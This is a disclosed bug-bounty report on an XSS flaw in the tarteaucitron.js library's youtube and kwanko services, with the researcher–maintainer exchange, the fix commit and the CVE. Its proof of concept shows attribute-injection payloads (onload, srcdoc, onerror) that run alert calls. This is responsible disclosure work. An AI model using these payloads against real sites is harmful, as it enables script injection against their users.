We've joined Protect AIJoin us over there for bounties up to $50,000+ for vulnerabilities in AI/ML repos

youtube service is vulnerable to XSS vulnerability in amauric/tarteaucitron.js

Valid

Reported on

Jul 2nd 2023

Description

If an attacker is able to insert a div with attributes on a page where the youtube service is enabled, they can craft a width attribute that would allow them to execute arbitrary JS on the page.

(Other attributes like theme or controls are also vulnerable to this.)

Proof of Concept

<!DOCTYPE html>
<html lang="en">
<head>
    <title>TAC XSS</title>
    <script src="tarteaucitron.js"></script>
    <script>
    (tarteaucitron.job = tarteaucitron.job || []).push('youtube');
    tarteaucitron.init({ readmoreLink: '/foo', orientation: 'bottom' });
    </script>
</head>
<body>
    <div class="youtube_player" videoID="vo-SxWZ7tyM" width='" onload="alert(`xss`);"'></div>
</body>
</html>

The srcdoc attribute can also be used for this (and should probably not be allowed):

    <div class="youtube_player" videoID="vo-SxWZ7tyM" srcdoc='<script>alert(`xss`)</script>'></div>

Impact

Imagine a website where users can post comments containing limited HTML (but not <script> tags). This vulnerability would allow an attacker to bypass this restriction and inject JS in the page.

We are processing your report and will contact the amauric/tarteaucitron.js team within 24 hours. 3 months ago
Pierre Rudloff
3 months ago

Researcher

Services that build <img> tags are also vulnerable. For example, the kwanko service:

    <div class="tac_kwanko" data-mclic='" onerror="alert(`xss`);"'></div>
We created a GitHub Issue asking the maintainers to create a SECURITY.md 3 months ago
We have contacted a member of the amauric/tarteaucitron.js team and are waiting to hear back 3 months ago
Amauri
2 months ago

Maintainer

Hi

Thanks for your report :)

The attr are already retrieved by a custom function https://github.com/AmauriC/tarteaucitron.js/blob/master/tarteaucitron.js#L2085 If I filter the result with this function, it should be enought? https://github.com/AmauriC/tarteaucitron.js/blob/master/tarteaucitron.js#L1808

Thanks!

Pierre Rudloff
2 months ago

Researcher

The best practice here would be to stop building HTML with concatenation and instead use DOM methods like createElement() and setAttribute(). However, this would require rewriting a lot of services code.

I guess calling fixSelfXSS() in getElemAttr() could be a quicker fix.

We have sent a follow up to the amauric/tarteaucitron.js team. We will try again in 7 days. 2 months ago
Amauri CHAMPEAUX validated this vulnerability 2 months ago

Thanks, I've applied this quick fix and note to review the code to create html with the DOM functions. https://github.com/AmauriC/tarteaucitron.js/commit/c4c2fcf2b2212ce968bdcae145bb74283c441e5f

Pierre Rudloff has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Amauri CHAMPEAUX marked this as fixed in v1.13.1 with commit c4c2fc 2 months ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
Amauri CHAMPEAUX published this vulnerability 2 months ago
to join this conversation